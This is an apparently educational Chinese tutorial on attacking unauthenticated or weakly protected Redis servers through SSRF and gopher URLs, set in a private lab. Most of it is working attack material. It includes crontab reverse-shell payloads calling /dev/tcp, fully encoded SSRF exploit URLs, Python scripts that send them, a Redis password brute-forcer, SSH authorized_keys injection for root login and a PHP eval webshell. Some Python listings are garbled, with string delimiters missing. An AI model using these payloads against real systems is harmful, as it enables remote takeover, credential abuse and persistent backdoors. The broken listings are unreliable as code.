!!!文末有视频讲解!!!
一、本节课程需要的主机
- Kali2.0
- Windows Server2003
二、本节课需要的工具
- Redis
- nc
- wireshark
- tcpdump
- python2.7
- docker
三、文章目录
- 0x01 Redis基础
- 0x02 Redis入侵,反弹shell
- 0x03 Redis认证攻击
- 0x04 写ssh-keygen公钥,使用私钥登陆
- 0x05 写webshell
0x01 Redis基础
一、Redis定义
REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。
Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。 ----摘自runoob
二、Redis安装
在开始之前建议先学习下Redis的基础知识:Redis基础知识,会事半功倍。
安装以Kali2.0为例,安装前需要更新源以及软件列表,参考链接:更改Kali源
安装如步骤如下:
1、安装redis
apt-get install redis-server
2、修改redis监听IP(如果不修改,不可远程登录),IP需要替换为自己的IP
vim /etc/redis/redis.conf
# 修改为以下内容
bind 127.0.0.1 192.168.0.67
3、启动redis服务
service redis-server start
0x01 Redis入侵,反弹shell
在开始讲攻击Redis之前,必须要理解Redis的客户端和服务端的通信方式,以及数据发送的格式,该目的的实现需要tcpdump的抓包功能。使用抓包软件来查看Redis客户端和Redis服务端的通信数据,找到语法结构后开始模拟客户端发送数据。
1、使用tcpdump来完成抓包,命令如下:
tcpdump -i eth0 port 6379 -w redis.pcap
参数说明如下:(更多tcpdump的教程,参考[Tcpdump教程](https://www.runoob.com/linux/linux-comm-tcpdump.html))
-i:指定网卡为eth0
port:指定抓哪个端口的数据
-w:将流量包保存为文件
2、使用Redis客户端登录Redis服务端,命令如下(默认无密码):
root@Kali-2018:~/tmp# redis-cli -h 192.168.0.119 -p 6379
192.168.0.119:6379> get a
(nil)
192.168.0.119:6379>
以上命令做了一个获取a对应的值是多少的操作,现在我们使用wireshark看一下抓到的包(使用追踪流-TCP流):
上面非常多的内容就不放了
*2
$3
get
$1
a
-1
如果不理解Redis的数据发送的数据包格式,是看不懂上面内容的,这里必须要讲这么几个内容:2.1、序列化协议:客户端-服务端之间交互的是序列化后的协议数据。在Redis中,协议数据分为不同的类型,每种类型的数据均以CRLF(rn)结束,通过数据的首字符区分类型。2.2、inline command:这类数据表示Redis命令,首字符为Redis命令的字符,格式为 str1 str2 str3 …。如:exists key1,命令和参数以空格分隔。2.3、simple string:首字符为'+',后续字符为string的内容,且该string 不能包含'r'或者'n'两个字符,最后以'rn'结束。如:'+OKrn',表示”OK”,这个string数据。2.4、bulk string:bulk string 首字符为'$',紧跟着的是string数据的长度,'rn'后面是内容本身(包含’r’、’n’等特殊字符),最后以'rn'结束。如:
"$12rnhellornworldrn"
上面字节串描述了 “hellornworld” 的内容(中间有个换行)。对于" "空串和null,通过'$' 之后的数字进行区分:
"$0rnrn" 表示空串;
"$-1rn" 表示null。
2.5、integer:以 ':' 开头,后面跟着整型内容,最后以'rn'结尾。如:":13rn",表示13的整数。2.6、array:以'*'开头,紧跟着数组的长度,"rn" 之后是每个元素的序列化数据。如:"*2rn+abcrn:9rn" 表示一个长度为2的数组:["abc", 9]。数组长度为0或 -1分别表示空数组或 null。
数组的元素本身也可以是数组,多级数组是树状结构,采用先序遍历的方式序列化。如:[[1, 2], ["abc"]],序列化为:"*2rn*2rn:1rn:2rn*1rn+abcrn"。
3、经过上面内容的讲解,在回过头理解抓到的redis的包就很容易明白了。
上面非常多的内容就不放了
*2 数组长度为2
$3 bulk string,代表字符串长度为3,就是get
get 普通字符
$1 bulk string,代表字符串长度为1,就是a
a 普通字符
-1 返回内容,-1代表null
明白以上内容后基本就理清了思路,如果要给redis发命令,按照他的序列化规则即可。现在有一个大胆的想法,如果我用gopher去执行redis的命令呢?为了实现我们的想法,我们在Redis中加一个key,名字为name,值为Margin。命令如下:
set name Margin
此时,我们使用curl来发起gopher的请求,如下:
curl gopher://192.168.0.119:6379/_*2
$3
get
$4
name
将其转化为url编码
curl gopher://192.168.0.119:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a
执行结果如下
margine:~ margin$ curl gopher://192.168.0.119:6379/_%2a%32%0d%0a%24%33%0d%0a%67%65%74%0d%0a%24%34%0d%0a%6e%61%6d%65%0d%0a
$6
Margin
那如果是在web漏洞中呢?如何利用?经过上一节课《Gopher协议在SSRF漏洞中的深入研究》内容可以很容易的联想到使用方法:
1、构造利用代码
2、url转码
3、再次url转码
web环境我们还是使用上一节课的代码(curl_exec.php),代码如下:
<?php
$url = $_GET['url'];
echo $url;
#var_dump(curl_version());
$curlobj = curl_init($url);
echo curl_exec($curlobj);
?>
最终构造利用代码为:
http://192.168.0.109/ssrf/base/curl_exec.php?url=gopher%3a%2f%2f192.168.0.119%3a6379%2f_%25%32%61%25%33%32%25%30%64%25%30%61%25%32%34%25%33%33%25%30%64%25%30%61%25%36%37%25%36%35%25%37%34%25%30%64%25%30%61%25%32%34%25%33%34%25%30%64%25%30%61%25%36%65%25%36%31%25%36%64%25%36%35%25%30%64%25%30%61
但使用curl请求后一直卡顿,没有任何回显,无比绝望,我的排查思路为下:
1、查看web日志,是否有错误日志(发现并没有)
2、在执行curl_exe函数前,加上exit()函数,这样我便能判断http请求是否到后台代码了(结果可以)
3、查看redis的命令执行记录(接下来讲这个)
在Linux命令行中执行以下命令来查看Redis命令执行记录:
redis-cli -h 127.0.0.1 monitor
执行结果为下图,说明redis接收到了来自gopher的请求,但没有命令回显,为什么?(需要在命令后面加QUIT,后面会用到)。
虽然无法回显命令执行的结果,但是命令确实是执行了,接下来测试下反弹shell(没有用上面讲的redis的数据包格式,下面的格式也可以),命令如下:
set mars "nnnn* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1nnnn"
config set dir /etc/
config set dbfilename crontab
save
上述命令的含义总结为,利用Redis的备份功能,将crontab的定时任务备份到/etc/crontab中,起到执行命令的效果,因为Linux会监测/etc/crontab的内容,当我们将反弹shell的命令加入进去后,变会被执行,具体解释如下:
# 添加名为mars的key,值为后面反弹shell的语句,5个星号代表每分钟执行一次,开始和技术的n必须要有一个,也就是前后各有一个,当然,多个可以,主要是为了避免crontab的语法错误。crontab知识可以参考:【https://www.runoob.com/w3cnote/linux-crontab-tasks.html】
set mars "nnnn* * * * * root bash -i >& /dev/tcp/192.168.0.119/9999 0>&1nnnn"
# 设置备份的路径为/etc
config set dir /etc/
# 设置备份文件名为crontab
config set dbfilename crontab
# 开始备份
save
进行二次URL编码,结果如下:
http://192.168.0.109/ssrf/base/curl_exec.php?url=gopher%3a%2f%2f192.168.0.119%3a6379%2f_%25%30%64%25%30%61%25%30%64%25%30%61%25%37%33%25%36%35%25%37%34%25%32%30%25%36%64%25%36%31%25%37%32%25%37%33%25%32%30%25%32%32%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%32%61%25%32%30%25%37%32%25%36%66%25%36%66%25%37%34%25%32%30%25%36%32%25%36%31%25%37%33%25%36%38%25%32%30%25%32%64%25%36%39%25%32%30%25%33%65%25%32%36%25%32%30%25%32%66%25%36%34%25%36%35%25%37%36%25%32%66%25%37%34%25%36%33%25%37%30%25%32%66%25%33%31%25%33%39%25%33%32%25%32%65%25%33%31%25%33%36%25%33%38%25%32%65%25%33%30%25%32%65%25%33%31%25%33%31%25%33%39%25%32%66%25%33%39%25%33%39%25%33%39%25%33%39%25%32%30%25%33%30%25%33%65%25%32%36%25%33%31%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%35%63%25%36%65%25%32%32%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%39%25%37%32%25%32%30%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%30%64%25%30%61%25%36%33%25%36%66%25%36%65%25%36%36%25%36%39%25%36%37%25%32%30%25%37%33%25%36%35%25%37%34%25%32%30%25%36%34%25%36%32%25%36%36%25%36%39%25%36%63%25%36%35%25%36%65%25%36%31%25%36%64%25%36%35%25%32%30%25%36%33%25%37%32%25%36%66%25%36%65%25%37%34%25%36%31%25%36%32%25%30%64%25%30%61%25%37%33%25%36%31%25%37%36%25%36%35%25%30%64%25%30%61
执行结果如下,1分钟后发现成功反弹shell。
9999
ls
bash: no job control in this shell
简易脚本如下:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib
url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"
# 攻击脚本,n的一定要转义
"set mars "n* * * * * root bash -i >& /dev/tcp/192.168.0.119/6670 0>&1n"
config set dir /etc/
config set dbfilename crontab
save
"""
def encoder_url(data):
encoder = ""
for single_char in data:
# 先转为ASCII
encoder += str(hex(ord(single_char)))
encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
return encoder
# 二次编码
encoder = encoder_url(encoder_url(data))
# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder
# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
0x03 Redis认证攻击
以上为Redis未授权访问攻击,但如果Redis设置了密码呢?
如果要执行命令的话,必须要有密码才可以,所以接下来的问题便是如何破解Redis的密码,首先想到的暴力破解。此时要研究下Redis如何验证身份信息。方法还是抓包,抓到认证的流量,重放即可。抓包发现:
*2
$4
auth
$6
Margin
可以翻译为认证命令为auth xxxx
那么我们将redis的密码改为任意密码,我设置为Margin
config set requirepass Margin
将请求包改为
auth Margin
quit
python代码变为
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib
url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.119:6379/_"
def get_password():
f = open("password.txt","r")
return f.readlines()
def encoder_url(data):
encoder = ""
for single_char in data:
# 先转为ASCII
encoder += str(hex(ord(single_char)))
encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
return encoder
for password in get_password():
# 攻击脚本
"auth %s
quit
""" % password
# 二次编码
encoder = encoder_url(encoder_url(data))
# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder
# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
if response.count("+OK") > 1:
print "find password : " + password
所以,在已知密码的情况下可以将攻击的python代码中加入认证的语句,如下:
auth Margin
set mars "n* * * * * root bash -i >& /dev/tcp/192.168.0.119/6671 0>&1n"
config set dir /etc/
config set dbfilename crontab
save
再次运行python脚本,便可成功反弹shell。
0x03 写ssh-keygen公钥,使用私钥登陆
在上面的内容中描述了如何使用Redis的数据备份执行命令,接下来讲解通过写入ssh-keygen公钥,使用私钥登录。思路还是利用备份,将私钥字符串备份到目标服务器.ssh目录下。
要完成此操作,需要两个前提条件
- Redis服务使用ROOT账号启动(可以临时执行sudo -u root /usr/bin/redis-server /etc/redis/redis.conf 来以root权限运行)
- 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。
首先在本地生成一对密钥
ssh-keygen -t rsa
margine:.ssh margin$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/Users/margin/.ssh/id_rsa):
/Users/margin/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /Users/margin/.ssh/id_rsa.
Your public key has been saved in /Users/margin/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:QKUmi/y9Tu27soIg2+rRrvDO16sQBnrSCzkVx4RcTSw margin@margine.local
The key's randomart image is:
+---[RSA 2048]----+
| ..=++o.. |
| ooE.o. |
|. . ..+ |
|.* . + . |
|* B . S |
|o*.+ . . |
|o=oo..o . |
|oo=.o.oo |
|o==o.+=++o |
+----[SHA256]-----+
查看密钥的字符串,一会使用Redis的备份功能,将密钥字符串传到目标服务器。
margine:.ssh margin$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local
构造payload,如下:
config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.local"
save
quit
进一步得到python代码为:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import urllib2,urllib
url = "http://192.168.0.109/ssrf/base/curl_exec.php?url="
gopher = "gopher://192.168.0.67:6379/_"
# 攻击脚本
"config set dir /root/.ssh/
config set dbfilename authorized_keys
set margin "nnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDgDf+ah2WKGExLdwR/wb8959lZiiV+N0l55PxuwjkclpCAiZSXW8QSMmXPEyRazonnb63cLQHyOnB3u7IPRlqCcKIRnB3qX0GtgjPgDDQlda5pCY99tgtzPQ6qkaiOaxy6k6GQFdSYU5if2m4c/B1DlVSodw7F0sI+v8OG2iGy8UY2n+B049EKpgky45V96xhA9lIFi1tYJiLF7X6tx8l2Jf4OkC8y5am6P1lIG2vg2eraY6iXsCsE8D8Q2nYxdPT5ogKgdyjWULzbRMBjaPgxlgktv12cYjxqbIQhlUKGQxbBxIESf8sY+NMAODAwR4wBDl3thllYsHCzUf5c9yVR margin@margine.localnn"
save
quit
"""
def encoder_url(data):
encoder = ""
for single_char in data:
# 先转为ASCII
encoder += str(hex(ord(single_char)))
encoder = encoder.replace("0x","%").replace("%a","%0d%0a")
return encoder
# 二次编码
encoder = encoder_url(encoder_url(data))
print encoder
# 生存payload
payload = url + urllib.quote(gopher,'utf-8') + encoder
# 发起请求
request = urllib2.Request(payload)
response = urllib2.urlopen(request).read()
print response
0x04 写webshell
经过上面文章的学习,对于写webshell来说便变得非常简单,要完成此操作,需要两个前提条件
- 当前运行redis的用户在web目录有写权限
- 知道web目录的绝对路径
步骤比较简单,原理还是利用Redis的备份功能,只不过这次是备份成webshell(redis所在的服务器需要phpstudy环境,参考Linux下phpstudy安装
修改python中的payload,如下:
"config set dir /var/www/html/
config set dbfilename margin.php
set margin "n<?php eval($_POST['margin']);?>n"
save
quit
"""
此处不贴完整的python代码了,执行后可以看到目标主机有了margin.php文件,使用菜刀连接即可。
到此文章结束。
感谢各位支持,原创不易,记得点赞。记得看下方视频。